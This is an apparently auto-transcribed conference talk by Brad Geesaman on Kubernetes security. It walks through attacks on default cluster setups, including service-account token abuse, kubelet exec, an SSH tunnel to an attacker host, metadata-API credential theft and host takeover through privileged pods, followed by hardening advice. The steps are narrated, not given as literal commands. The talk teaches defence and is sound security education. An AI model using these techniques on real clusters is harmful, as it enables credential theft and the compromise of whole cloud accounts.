Securing Kubernetes Cluster Hacker’s way

Youtube video

While Kubernetes offers new and exciting ways to deploy and scale container-based workloads in production, many organizations may not be aware of the security risks inherent in the out-of-the-box state of most Kubernetes installations and the common practices for deploying workloads that could lead to unintentional compromise.

Join Brad Geesaman, the Cyber Skills Development team lead at Symantec, on an eye-opening journey examining real compromises and sensitive data leaks that can occur inside a Kubernetes cluster, highlighting the configurations that allowed them to succeed, applying practical applications of the latest built-in security features and policies to prevent those attacks, and providing actionable steps for future detection.

The hardening measures taken in response to the attacks demonstrated will include guidelines for improving configurations installed by common deployment tools, securing the sources of containers, implementing firewall and networking plugin policies, isolating workloads with namespaces and labels, controlling container security contexts, better handling of secrets and environment variables, limiting API server access, examining audit logs for malicious attack patterns, and more.

About Brad Geesaman Brad was recently the Cyber Skills Development Engineering Lead at Symantec Corporation where he supported the operations and delivery of ethical hacking learning simulations on top of Kubernetes in AWS. Although he spent several years as a penetration-tester, his real passion is educating others on the real-world security risks inherent in complex infrastructure systems through demonstration followed by practical, usable advice on detection and prevention.

The github repo that all the demos are being run out of it’s in a separate window for me you can also run those two in front of you if you’re far back and not able to see the text if it’s going by a little bit too quickly i have to apologize that i have to go through it so quickly because i have so much to show and i want to show it to you so this is more of a of an index so to speak you can go back and then dive in deep as you’re at your leisure a little bit about me formerly a penetration tester consultant last five or six years using the cloud almost exclusively designing ethical hacking simulations or capture the flag exercises and in the past year we’ve been running my former company we’ve been running capture the flag exercises on top of kubernetes inside aws that sounds crazy it is a little bit but we worked very hard to make sure that was a success in the past few months i spent a lot of time looking at as many clusters as i could researching kubernetes security and policy and so that body of research that work is what i want to share with you today so for the past five months i’ve installed a few clusters i’ve dreamt that i was installing a cluster while i was asleep it was very surreal um by show of hands who has a cluster that’s listed here or an installer uses an installer that’s listed here with one of those versions or similar to that okay a fair number of you welcome how many of you run your own distro you rolled your own brave souls awesome it’ll still apply to you i promise

the biggest takeaway from a security perspective for me is looking at all of these installation mechanisms that the thing that stood out was a malicious user with a shell by default i’m saying default on purpose can very possibly and almost very likely exfiltrate source code keys tokens credentials elevate their privilege inside the cluster from a non-privileged state to a privileged state inside of kubernetes which often then leads to root access on the underlying nodes and i think bullet point number four is probably the most interesting or or something that hasn’t been talked about as much really expand the blast radius to your entire cloud account in some situations so i hope to be able to get to that quick enough to be able to cover that in its in its entirety the goals of this talk i want to raise awareness of those high-risk attacks in as many installers or distributions as possible so that everyone has that knowledge demonstrate the attacks live i’m not brave enough to type live and i don’t type quickly enough live so these are recorded typing sessions which then that offers you the ability to have at home and look at and examine finally we want to provide some hardening methods for those specific attacks and then additional guidance that goes a few more steps beyond that

so like morpheus i’m beginning to believe beginning to believe that high system complexity means for users who are new to the to the a project that getting it to work from an operator’s perspective getting it to work is hard enough you know it’s such a wide range of new terminology tools and mechanisms that most people use the defaults the first time through right so look they probably know better than me i’m just going to accept the defaults let’s go see how it works but defaults tend to have inertia so defaults in use early tend to stay in use and system systems hardened late tend to break and that’s kind of um as i was going through all the clusters that was that was what i was doing so i was running into it left and right so my belief is that having default values be secure early on in terms of a project or how you’re distributing your your your project in source code has positive downstream effects to the community and when something like kubernetes literally blows up has widespread adoption that inertia is big and it’s real

and what that kind of leads us into is a i call it a security capability gap i struggle with a name for what this is but basically the community at large is somewhat behind the major dot releases as they’re coming out so maybe you’re between 1-5 and 1-7 most mortals you know can’t literally deploy overnight a brand new kubernetes release but most installers um and connect containers of service offerings are keeping up right but the trick is is that security capabilities and features are coming in newer releases so if you’re still on one five and one six our back is really rough for you but if you’re in one seven and one eight it’s been baked in it’s been battle tested and things like that so it’s tough because you have to keep up with those ever fast moving releases and so it’s up to you to add additional security hardening if you’re on one six and one seven don’t despair it just needs a lot of elbow grease the things i wanna talk about today are not extreme in-depth esoteric attacks kernel level exploits and things i’m talking about low-hanging fruit i believe i found enough of it to share with you and that’s enough for a start right i want to raise the bar just doing the basic image safety r back network isolation just doing those things and enforcing those basic controls that are already there already existing inside clusters so when you go to harden some clusters what what are some of the challenges well a lot of folks like to use disa stig or cis benchmarks as a way to say what’s the security posture of my cluster well at the operating system level those specific benchmarks don’t take into account the workload that’s running on them they say you know that’s the password and that’s the group are those properly set with permissions but it doesn’t know anything about kubernetes and conversely if you’re doing a cis cooper cooper’s net kubernetes benchmark it’s not taking into consideration the os but it’s not also taking into consideration how the installer places things and where it puts it and where it grabs it from from the cloud provider so basically properly harding your kubernetes cluster is highly dependent on your environment your add-ons your plug-ins and the defaults are very often not enough there’s a lot of knobs you have to tweak and we’re going to go through some of those

something i like to call attack driven harding this is just how i think it’s been built into me as a pen tester every time i look at a system i think this way and i try to reason about a system in this way in terms of its security posture and the best way i can summarize it is and how i think i think in progressive steps i say from where i am what can i see do or access next i pick one of the most plausible methods and i say all right assume that happened all right now what does it look like what can i see do or access next and i repeat until it’s game over until the worst date is got and extracted and then i work backwards and i harden as i go further away it’s basically quick and dirty attack modeling so everybody here today can take that persona of the external attacker if you’re looking at a cluster typically these are the methods you’re thinking of right off the bat are you going to be able to get ssh access to the nodes maybe not likely go through the api server maybe not likely you don’t have credentials for either of those but what about getting a shell on a container inside the cluster that’s where it gets interesting and the three that i came up with that were right off the bat are exploiting an application running an exposed container that’s hit or miss not all apps are extremely vulnerable with a remote code execution tricking an admin into running a compromised container that’s that’s interesting or compromising a project developer compromise their github keys or their docker registry keys and modifying the project images and binaries throughout this research i did find somebody’s credentials in a git commit by accident i was just looking at code and i found it and they were after i reported it to them they did say it was indeed their company’s ability to push to quay so that is a real deal so protect your keys so which is easier i’m gonna pick on number two today teaching an admin

i’ve written a couple blog posts but i’ve read thousands and i found something it’s kind of a pattern if you say here’s something really complicated use my custom images hey here’s my docker file everything’s on the up and up in those instructions is what acute control create from that url just slam all these pods and services in and then figure it out and see what happens i like to think coupe control create from url is the new curl into bash because it really is and it’s often worse because now it’s distributed across thousands of nodes i said this is about hacking and hardening let’s make with hacking for the rest of the attack structure this is my 3d diagram of a sacrificial cluster in the lower left you have the master node in the upper right you have two workers very straightforward very simplistic we got a couple of pods running not all are represented here but just the ones we care about in this case and we have the metadata api represented as that yellow block up there

so my handy dandy little attacker icon here if he’s able to exploit the vulnerable app in the default namespace if they get a shell can they install custom tools and by doing so approve internet access which is something that penetration testers always love to have when you try to pull down your tool sets um can i install curl netcat and that can i pull down the kube control binary and put it into a place and run it that’s always interesting

another look at things it’s not common anymore but in one four and one five if you’re running one four and one five a lot of the installers back then or if you rolled your own you might still have the insecure bind address on your api server that’s a big no-no because there’s no authentication or authorization on this this is a direct pass the cluster admin so notice that little red triangle that means a bad day whenever you see a red triangle

whenever you’re doing a penetration test and you break into that first system the first thing you do is say what does the world look like i have no idea where am i going i’m running scanning tools i’m just throwing packets everywhere well in a distributed system where everything’s based on apis that enumeration is just a couple curl commands now if i hit c advisor keepster kublet prometheus is node exporter cube state metrics any of those and it’s just like tell me about yourself well here here’s everything about myself and what they’re named and where they’re running and what their pod hashes are everything is right there so that leads me to my first demo because we have crew control because we have that access um we can list the nodes and we can see the ip address of one of the nodes and c advisor runs on 4194 and you hit the metrics endpoint see advisor will happily tell you everything about what’s running on this system including pod names which are always randomized the name space they’re in and the container names and the versions the shaw hashes basically everything that i’m running there’s my redis we’ll get to that guy later

this one i think is fairly well known but it’s incredibly important um the default service token if that’s located in this directory it’s auto mounted in a lot of clusters specifically before our back this is a really big deal if you have our back enabled we’ll get to some of that but if you can run kubectl crew control sorry i was corrected this morning in the keynote coupe control you can get get pods get secrets and your cluster admin again red triangle bad day so we can install some tools download the coug control binary validate we can hit the api yes we have the service account token mounted we can get pods list all the secrets look for the good ones and dump those contents so four five curl commands and we’ve escalated

next thing we want to look at the kubernetes dashboard raise your hands if you run the kubernetes dashboard awesome are you running one seven or higher version of the dashboard yeah okay all right so as you know there’s no authentication on it it needs protection all right so if you’re in this vulnerable app pod here most often you can just hit it by its service name you don’t even need to know what the ip address is right well that’s kind of tough how do i hit that it’s it’s a curl command it’s a big dashboard we can forward a port over ssh that’s really two commands away so yes we’re inside kubernetes let me get the service yup the dashboard’s there let me get the ip address by pinging it that’s a cheap way to do it without having dig installed and then we’re going to ssh out to my bad ip that’s my attacking system say remote port 8000 funnel it on down into the dashboard so on that remote attacking host you go to localhost 8000 and the dashboard is in front of you

what about tampering with other services inside the cluster um as you can see there’s a vote and a redis the azure vote front an azure vote back application um it’s a very simple python app with a redis back you can vote for cats or dogs right hack the vote we’re going to tamper with it

i grew up with cats so i’m going to pick on cats today so we’re going to get the service azure vote back get its ip yup port 6379 is open let’s install the redis cli can we connect to it yup we can dump the keys i like cats being a thousand let’s set cats to a thousand and let’s go hit that web front page i apologize it’s in curl but it’ll be you’ll see it at the very bottom there cats is one thousand dogs is six right take that and extrapolate that to any authenticated service inside the back end of your cluster right redis i just picked one because it’s simple and straightforward to demonstrate here we get a little bit more interesting the kubelet exploit how many of you heard of this attack method the kublet exploit well it’s basically not an exploit that’s why it’s kind of an air quote the kubelet api allows this and in clusters without certain settings on the kubelet will allow anybody to connect to this endpoint and exec into containers ask for logs um and do other nefarious things

so what we’re going to do is we’re going to ask the kublet to run a command in a given container on it so by one curl command we can say hey i want you to exec you know list this directory inside that pod right there running on that node so we’ll get the the node ips right here port one zero two five zero that’s the read write kubelet api port 10255 is the read-only metrics port right when we hit the the method running pods we’re gonna cut it out into a file so that it’s easier to look at it’s a nice json object again very much like c advisor it’s everything that i’m running on the kubelet this is all i know and what i’m running complete with the hashes the namespace the pod name and the container name which is important for the next command john you got the azure vote front that’s the one we’re going to pick on so we’re going to look at the web directory of the azure vote front app

run is the action default is the namespace azure vote front numbers that’s the pod name and then the container name and you just say hey run command list this root directory

app looks like an interesting directory let’s look in there main.pie looks interesting we’ve just extracted the source code for this super sensitive application okay

accessing scd service directly most clusters don’t expose etcd to the workers but some install a separate scd instance to support calico or network policy back ending and some in some cases that’s also exposed with no no tls or authentication or authorization so in this case you may be able to defeat the system that is storing your network policies saying you know what if there are network policies but you can hit this at cdn point you can go in there and say calico forget about all your network policies and calico will happily remove all the network policies from your nodes in your cluster this is pretty rare but i’ll get to the the frequency of this one now any of those methods that i showed about getting a kubelet or a service account token will let you possibly schedule a pod that mounts the host’s file system add your own ssh key and then ssh into it

now we’re getting into the multi-step parts here but what we’re going to do is we’re going to get the external sorry we’re going to get the the node name as it’s represented inside of kubernetes the external ip address of that node so we can ssh into it later create a very simple pause specification i pick on engine x because it’s based on debian but we make sure it’s privileged is true we mount the root file path

here’s what it looks like with the node selector in there so that gets scheduled on that one single node we run it we exec into it we troop into the slash root file system bit and now we’re on the host as root add our own ssh key back on out and then ssh directly in

so if you’re root and you’re able to run docker containers under the hood that kubernetes doesn’t know about run back doors and solve things it’s um it’s a pretty bad day the last classification of tax i want to talk about is is accessing the metadata api who’s heard of the 169 254 169 254 okay we know what that is um one of the things that it does is gives instance data about itself what region it’s in its bootstrapping information that often in some of these installers cases has sensitive s3 paths or kube adm join tokens right so right then and there that’s a bad day but also most of these cluster installations will provide im instance roles attached to the workers and the masters with permissions also available via that metadata api are those aws keys they rotate every few hours but they’re just a curl command away so let’s curl those and get those from that vulnerable pod that we talked about we run one command and we get keys that are valid for a couple hours we export those into our local shell and our attacking system right and then we have the permissions that are available to those those keys so describe instances you know list me all the instances in your entire account not just your cluster everything in that aws account and describe the instance attribute called user data on every single instance in your entire cloud account how many of you have sensitive things in your user data in things that are not kubernetes maybe possibly that’s why this blast radius is pretty bad because you might not compromise your kubernetes cluster but that web server there that bootstraps that has a github key or something in it that might be delivered via user data you can reach over and go grab that so that’s a bad day for the other administrators

when i talk about impermissions the masters and workers typically have something that looks like this describe star for the worker masters have ec2 star ecr ability to pull images from from aws ecr and some s3 capabilities but we really want that ec2 star don’t we that means any aws ec2 command is available to us so how would we get that we need to make sure that curl originates from the master so there’s a couple ways of doing it compromising an existing pod running on the master it’s kind of tough or using one of those two issues that we just talked about if you find a service account token just asking the api server or just ask the kublet running on the master to run a command for you inside of a pod so it looks like this basically wrapping a curl command this way or this way notice how close they are it’s basically the same thing just asking somebody different to do it

and the final example of why this is a bad day if you have ec2 star you can create a new vpc create a new security group create a new new ssh key create a new instance and snapshot every volume from every single instance in your entire cloud account and then go ahead and mount it on that instance so that can be automated as you can imagine within 5 or 10 minutes it’s a it’s a pretty bad day so if you’re also on the master you then might be able to in some cases based on the installation by default list everything in aws s3 who stores logs and sensitive backups in s3 it’s a bad day

so attacks 9 and 10 i’m switching gears i’m now talking about gke and gce in gke specifically there’s an attribute much like the user data endpoint on the api there’s an attribute called qbnv and that’s what the kubelet uses the bootstrap itself it gets its keys from it that’s often reachable directly

oops just clicked there we go

so here’s that listing part of the security feature is that you have to pass a header into google’s api to make sure that you’re doing it um not through a server-side request for you but configure sh looks interesting kuben v looks interesting user data looks interesting so we can go poke at those this references the kubi nv so right there you see there’s a lot of good stuff we know what the release is we know where it’s getting things from we know what the ips of the master are but we can see that here’s the coop the kublet’s information on where it gets his key cert and ci pem right this wall of text is what i call the one shot so if you get a shell on the container inside a gke you can become the kublet in this one shot awesome bash hunk of of junk here create a pull down a coupe control grab the kub env from the metadata api strip out the parts base64 to code them into the kubelet’s authentication tokens and then run kubecontrol to list all the pods and all the namespaces

boom so one of the things of note is you want to probably get the secrets right well the kublet doesn’t have the ability to go list all the secrets but it can pull a secret if it knows its name well the best way to get that is to output all of the get pods in yaml or a pod that you know of specifically and i did the dashboard here because i know it’s got the cluster admin token you can say hey dump the pods back in yaml and it will tell you the mounted secret by its name so now you know what that is

you can go get that secret directly in this case it’s the default service count token in the cube system namespace

so what we’re going to do with that is the same thing i’m actually going to skip this part for the sake of speed mount host file system add ssh and ssh in

the second method through the gke and gc metadata api is just like an ec2 assigning permissions to instances gke does the same thing they give you an im token and they give you instant scopes and that item token lets you talk to the google api the met the compute api and run actions on things inside the scope of that project and one of those things that you can do is enumerate all the instances of course but you can also use this really handy dandy api method called add ssh key so if you have these privileges and you have this token you’re able to be on worker one call for the token go hit the api saying hey add my ssh key to worker 2 and google will happily do that if you’re authenticated and then you can ssh into worker 2 or anything inside that scope of that project so if you’re running multiple clusters that means any of those nodes and all the clusters in that same project so we’re going to get the external ip so we know what the ssh into when we’re done we’re going to basically list the instances in the project

okay we’re going to page through it a little bit just you can see how much information information is here a lot of good stuff ip addresses external gnats things

the user data the kube envy for all the instances inside the project right you’re doing an aws ec2 describe instances that equivalent inside of google as well okay so i’m going to go ahead and do that same thing but describe instance i’m going to see everything about this one node so i can get its fingerprint which is needed for this api call i’m about to form and forgive me i use curl and bash to keep it simple so it makes it a little bit ugly but you don’t need to download any extra tools there’s no malware running here it’s all curl and bash and and such so what we do is we make a post body with that fingerprint that we just pulled add my ssh key as you can see the public key we’re going to post it to that api

i’m going to show you what it looks like rendered that’s what the final post body looks like here google go add me to work or two okay happily does it and we’re root on that second node

again a bad day okay

docker ps how prevalent are these issues this is what compelled me to do this talk and i want to stress something this is not the entire security posture of every one of these clusters this is a narrow band of these items that i’ve identified here it doesn’t say anything about the rest of them these specific versions the ones that i tested note those versions i started testing in august and september okay we’ll get to what the latest releases look like so it’s prevalent right you’d admit that it’s it’s not uncommon so don’t despair we can do it we have the technology attacks seven through ten if you’re running an aws i recommend what’s called a metadata proxy something that makes sure that when you go to 169 254 that you’re allowed as a pod kub to im or kim both worked in my testing to to to make sure that in aws you’re taken care of excuse me the gce metadata proxy and these steps and i apologize the word these steps is actually masking google’s gk hardening blog post that was released very recently that is an incredibly important link i apologize that was a late edition that is really useful for blocking those attacks that i just showed right and if you’re running network policy on 1.8 that is also a valid method egress blocking and if you’re running older versions of kubernetes like i was and you’re using calico you can use calico ctl under the hood to get that same effectiveness it’s not through the kubernetes api but you can do it protect the kubelet authorization mode webhook if you don’t see that that’s your kubla is probably allowing that kubelet exploit bit isolating workloads remember like the hack the vote there change it to cats a very simple network policy literally stops out in this tracks you say every pod that lay the has the label azure vote back make sure that it only gets ingress from azure vote front

excuse me this is almost a 99 perfect drop in if you’re running the dashboard and you have network policy ingress support drop this in and it will protect your dashboard

it’s a bit of a trick so we have the pod selected that says the kubernetes dashboard only but there’s no rules so by default that means a default deny this does not block coupe control proxy that works for the api server this is from blocking from pods which have no business talking to the dashboard restricting the default service account token node and rbac and node restriction and i want to stress something you have to exact in the pods and verify this right it’s very easy to miss this or do this incorrectly if you’re messing with our back and monitor all rbac audit failures you either have a misconfiguration of your app or somebody’s attacking you and they’re failing

and i’m happy to say in 1 8 and above supporting egress natively this policy works in your clusters as a really nice default deny platform apply this to every single one of your name spaces which says ingress and egress nothing is allowed by default in this namespace nothing except coupe dns lookups to start put this down as a cluster administrator and then deploy your network policy for your workloads with your workload lifecycle so when you’re deploying azure vote front and back apply the network policy that allows those two to work together at that time

excuse me and i’m happy to say that throughout these last five months i’ve worked with every single one of these projects directly disclosing the issues that i found a lot of cases they were already in progress already in flight fixing them um but with newer releases and kubernetes one 8 and a little bit of elbow grease we can look like this we can literally wipe out this classification of vulnerabilities for good and make the infrastructure nice and boring two tools i’m going to tell you about kube atf it was a tool that i wrote to help automate the creation and validation and destruction of all these clusters in a sane way because i spun them up every day for two hours and threw them away kept going through all of them excuse me and heptio’s sono buoy i wrote a plugin was basically a proof of concept there’s so much more you can do with this i currently run a cis benchmark using aqua security’s cube bench so by deploying this plugin into sonobuoy we can continually scan our nodes for for posture assessment in a very sane way

so even more security hardening tips this is where it goes above that line on that apple tree i showed you this is where it gets a little bit more advanced let’s assume that you’ve all done all the things that i just suggested here’s what you want to look for you want to verify that all your settings are properly enforced i can’t tell you how many times i thought i hardened something and i go validate it and i didn’t do it just correctly i didn’t get that labeled just right et cetera it’s important that you validate those keep up with the latest versions if you possibly can because they’re adding useful security features in every dot release audit all the the the levels that you can the os the runtime in kubernetes i like the cis benchmarks log everything outside the cluster that’s important

excuse me

um practice safe image security there’s all sorts of good um talks and blog posts about this and tools that help with that i already covered the kubernetes components a bit but the network security policy bit is incredibly important now that we have ingress and egress use that to your advantage you can mask a lot of attacks by just not having network access okay protect your workloads by default by saying no ingress and egress and then apply what you’re allowed to it’s it’s white listing not block listing and i added this the other day considering a service mesh there’s a lot of benefits other than all the things that it does for your application and visibility in mutual tls but it makes your workloads more isolated when they talk to each other just by default and how it works

i think some folks have talked about this before but namespaces pretend it is really good when you combine it with that default deny policy set right if you have microservice here microservice here and microservice here they’re all default denies by default microservices can’t talk to each other until you allow them right you can be explicit us this is something we learned from the capture the flag exercise make sure that cpu and ram limits are on all containers and i know disk and network are somewhere down the line um to prevent malicious actors from just filling the disk or consuming all sorts of ram with with all sorts of tools um something that people don’t talk about which i think is kind of interesting is on your pod specs if you’re running a pod that has no business talking to the api server in your pod spec don’t mount the service account token you don’t need it don’t put it there even if it’s got no permissions right defense and death and use a pod security policy to enforce container restrictions and protect the node that’s something that’s going to mature over the next few releases and shout out to some of the vendors that i talked to this is kind of an important note the container aware malicious activity and behavioral detection capabilities that’s incredibly important for stopping the initial attack right where it started at the syscall level a shell cannot happen a curl cannot be downloaded it cannot be exact etc you stop it this tracks right then and there number three on the miscellaneous security bit separate cloud accounts projects or resources groups for different workloads or different clusters i think a one-to-one mapping is safe for now it’s just too there’s too many ways to hop across and don’t run dev and test workloads and clusters at the same time as production or in the same place as production again because of so much opportunity for crossover and then depending on your regulatory requirements separate node pools for separate workloads using annotations to make sure sensitive stuff happens here non-sensitive stuff happens over here

here’s some of the tools that i came across that i found of note that you might want to take advantage of when you’re looking at auditing the cis benchmark has been updated for 1.8 it’s a great resource coupe bench implements it nicely very straightforward to run the cis os and runtime hardening stuff from devsec and ansible hardening from major hayden and the other folks from openstack are really good at making sure the underlying postures on your systems are great and then kube audit which i’m looking forward to i think that’s the next talk and sono buoy i think there’s a lot of room for growth here in this space

notable security features in one eight network policy and pod security policy whitelisting the egress is huge volume mount whitelisting prevents a lot of those node access bits that i was just showing you

so in closing as a community we’re all responsible for that safety and security applications that power world let’s make that foundation secure by default and incredibly boring

the question is what’s the what’s the number one um all the above but if the first thing is enabling our back a huge classification of those things don’t happen in a properly configured rbac-enabled cluster right and then the rest still you have to do because notice how all the things that i was doing required no special tools it was just access that you have so combining that with network policy just it shuts off everything to start you might you might have a vulnerable kubelet right the kubelet exploit but if you have an egress policy you can stop that network access assuming you put it on every namespace right so you can you can mitigate and work around without having to fix the underlying things with some some clever policies did i look at openshift the answer is yes um i wanted to focus on vanilla kubernetes because as you know openshift is a slightly opinionated distribution of kubernetes the only thing that applies to openshift from the things that i talked about by default is the metadata api they don’t put anything sensitive in user data and they don’t put any im um credentials associated with those workers by default that you would get that if you go ahead and do that then that’s available and they’ll need the metadata proxies but that’s the only thing i i hesitated in lumping it in there because it’s such a different beast compared to how all these were lined up it’s a little bit of an unfair comparison but i would highly recommend you look at open shift in terms of at least a reference point for their their security model without plugging i have no horse in the race

This guide is part of series where we bring best to you, we have made modification to original content.
Speaker: Brad Geesaman, Symantec
Attribution Credits: